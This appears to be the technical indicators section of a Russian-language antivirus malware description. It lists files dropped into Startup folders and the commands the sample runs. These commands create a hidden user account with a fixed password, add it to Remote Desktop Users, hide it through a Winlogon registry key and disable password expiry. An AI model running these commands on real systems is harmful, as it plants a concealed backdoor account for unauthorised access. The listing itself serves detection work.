Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\update.exe
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\update.exe
- <Текущая директория>\new.exe
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" test /add
- <SYSTEM32>\net1.exe localgroup %USERNAME%s test /add
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v test /t REG_DWORD /d "00000000" /f
- <SYSTEM32>\net1.exe accounts /maxpwage:unlimited
- <SYSTEM32>\cscript.exe ldapdi.vbs
- <SYSTEM32>\cmd.exe /c ""<Текущая директория>\delme.bat" "
- <SYSTEM32>\net1.exe user test g09320n /add
- <SYSTEM32>\ping.exe localhost -n 3
- <Текущая директория>\ldapdi.vbs
- \Device\LanmanRedirector\CRNJEUFU*\MAILSLOT\NET\NETLOGON
- <Текущая директория>\dom.tmp
- <Текущая директория>\delme.bat
- <Текущая директория>\new.exe
- C:\Documents and Settings\Default User\Start Menu\Programs\Startup\update.exe
- <Текущая директория>\dom.tmp
- <Текущая директория>\ldapdi.vbs